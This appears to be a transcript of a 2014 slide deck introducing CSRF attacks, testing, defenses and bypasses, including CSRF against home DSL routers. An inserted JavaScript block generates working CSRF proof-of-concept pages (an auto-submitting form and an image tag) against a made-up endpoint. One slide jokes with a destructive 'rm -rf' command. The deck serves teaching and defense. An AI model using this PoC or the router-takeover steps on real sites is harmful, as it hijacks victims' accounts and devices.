
Introduction to CSRF Attacks & Defense


It's the PPT of the presentation at the Null Hyd June 2014 meet.
I tried to make it as simple as I can :)
Share if you like and please let me know your suggestions :)


  1. Introduction to CSRF Attacks & Defenses.
  2. Who am I? I'm P.B.Surya.Subhash, a 17 year old coder, hacker and student. Certified by Microsoft and was offered a job by Yahoo, Dell, Slideshare and a couple of other MNCs. Helped USA.Gov, Nic.in, NCSL, Netherlands. pbssubhash@gmail.com | @pbssubhash | Fb.me/pbssubhash | Linkedin.com/in/pbssubhash
  3. And many more…
  4. Agenda
     • What's CSRF?
     • Impact of CSRF
     • How to test websites for CSRF?
     • Real-time attack scenario of CSRF
     • Defenses against CSRF
     • How to bypass those defenses?
     • Using CSRF to compromise DSL routers
     • Conclusion
  5. What's this CSRF?
     • Cross-site request forgery, abbreviated as CSRF and also known as session riding.
     • Forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. The browser attaches the victim's session cookie to every request it sends to that site, no matter which page caused the request, so a request triggered from an attacker's page looks to the server like one the victim made.
  6. Impact
     • A successful CSRF exploit can compromise end-user data and operations in the case of a normal user.
     • If the targeted end user is the administrator account, this can compromise the entire web application.
  7. That's all?
     • Anything an authenticated user can do.
     • No restriction from the same-origin policy, except…
     • Attackers cannot read responses from other origins.
     • So the attack is limited in what it can do with data: it can trigger actions, not read them back.
     • Severe impact on accountability: log entries reflect the actions a victim was tricked into executing.
  8. How to find these? Capture a state-changing request (change email, transfer funds, add user), replay it from a page on a different origin while logged in, and see whether it succeeds. If the request carries nothing the attacker could not predict (no token, no re-authentication), it is forgeable. So let's break it! (root@null: rm -rf /root/earth/security/)
  9. Let's exploit it!
  10. Killer combination! • Persistent script injection + CSRF = PWN3D. Stored XSS on the target origin runs inside the victim's session, so it can read the anti-CSRF token from the page and submit the forged request itself; the token defense no longer helps.
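The "let's break it / let's exploit it" slides above do not show the actual attack page. The following is an added example, not code from the deck, of the two standard CSRF proof-of-concept forms: a single `<img>` for GET endpoints and an auto-submitting hidden form for POST endpoints. It also shows why the "only accept POST" and "convert POST to GET" slides later in the deck matter: a server that reads the same parameters from either method falls to the cheaper `<img>` variant. The target URL and parameters (`vulnerable.example`, `/account/email`) are made up for illustration; the same generator applies to the DSL router scenario at the end of the deck by pointing it at the router's LAN admin URL.

```javascript
// Added example: minimal CSRF proof-of-concept generator (not from the
// original presentation). All target URLs and parameters are constructed.

// Escape text for embedding in an HTML attribute, so quotes or ampersands in
// parameter values do not break the generated page.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// GET-based CSRF: one <img> tag is enough. The victim's browser fetches the
// URL with the victim's cookies attached; the attacker never needs to read
// the response, which is exactly what the same-origin policy forbids anyway.
function buildGetPoc(targetUrl, params) {
  const qs = Object.entries(params)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`)
    .join('&');
  const sep = targetUrl.includes('?') ? '&' : '?';
  return `<img src="${escapeHtml(targetUrl + sep + qs)}" width="1" height="1">`;
}

// POST-based CSRF: a hidden form submitted by script as soon as the page
// loads. "Only accept POST" does not stop this; the browser still sends the
// session cookie with the cross-site form submission.
function buildPostPoc(targetUrl, params) {
  const inputs = Object.entries(params)
    .map(([k, v]) => `    <input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}">`)
    .join('\n');
  return [
    '<html><body>',
    `  <form id="csrf" method="POST" action="${escapeHtml(targetUrl)}">`,
    inputs,
    '  </form>',
    '  <script>document.getElementById("csrf").submit();</script>',
    '</body></html>',
  ].join('\n');
}

// Pick the variant by method. Against a handler that accepts its parameters
// from either method, try the GET variant first: it needs no script at all
// and works inside places where only an image tag can be injected.
function buildPoc(method, targetUrl, params) {
  return method.toUpperCase() === 'GET'
    ? buildGetPoc(targetUrl, params)
    : buildPostPoc(targetUrl, params);
}

// Constructed example target (hypothetical): a change-email endpoint.
const EXAMPLE = {
  targetUrl: 'http://vulnerable.example/account/email',
  params: { email: 'attacker@evil.example', confirm: '1' },
};

// Usage: print both variants for the constructed target.
console.log(buildPoc('GET', EXAMPLE.targetUrl, EXAMPLE.params));
console.log(buildPoc('POST', EXAMPLE.targetUrl, EXAMPLE.params));
```

Note that browsers which default cookies to SameSite=Lax (a later development than this deck) generally do not attach the session cookie to either of these cross-site requests, which is why the PoC should always be tested against the real target rather than assumed to work.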
  11. Defenses
     • The simplest one is to validate the Referer header in the HTTP request, rejecting requests from unknown sources. Where the browser sends an Origin header, check that in preference; it is sent on cross-site POSTs and is harder to strip.
     • The most popular one remains the token: an unpredictable value tied to the user's session that the server checks on every state-changing request. An attacker's page cannot know it, so it cannot forge a valid request.
     • A custom HTTP header such as X-Requested-By: MySite.com. Not so popular, but effective: a cross-site form or image cannot carry a custom header, and adding one from script turns the request into a CORS preflight that the target server does not approve.
     • Same-origin policy. On its own this is not a CSRF defense: it only stops the attacker from reading the response; the forged request is still sent with the victim's cookies.
     • Re-authentication.
     • Captcha.
  12. Common mistakes
     • Not validating the token, for example generating and sending it but only checking that it is present rather than comparing it with the session's value.
     • Not applying the captcha properly. Example: http://www.youtube.com/watch?v=zl0ARKQhoLA
  13. Misconceptions: defenses that don't work
     • Only accept POST
       - Stops simple link-based attacks (IMG, frames, etc.)
       - But hidden POST requests can be created with forms, frames, scripts, etc.
     • Referer checking
       - Some users prohibit Referer headers, so you can't just require them
       - Techniques to selectively create HTTP requests without a Referer exist
     • Requiring multi-step transactions
       - A CSRF attack can perform each step in order
     None of these approaches will sufficiently protect against CSRF on its own!
  14. Intro on how to bypass those defenses
     • Clickjacking
     • Bypassing SOP
     • Insecure crossdomain.xml
     • Openly available exploits
     • Bypassing the captcha
     • Checking token validation
     • Checking header validation
     • Converting POST-based requests to GET-based requests (works when the server reads the same parameters from either method)
  15. CSRF to compromise DSL routers?
     • Home DSL routers aren't secure from specialized CSRF attacks. Once the DSL router is owned, attackers can have their way with the internal network.
     • Attack steps: initiate a connection to the new DSL router, turn on remote management, add a password to the admin user account.
  16. Demo time
  17. References
     • https://en.wikipedia.org/wiki/Cross-site_request_forgery
     • https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
     • https://docs.djangoproject.com/en/dev/ref/contrib/csrf/
     • https://projects.webappsec.org/Cross-Site-Request-Forgery
     • https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet
  18. Anything to ask?
  19. Bye! Please drop your suggestions at @pbssubhash (or) pbssubhash@gmail.com. Thank you!
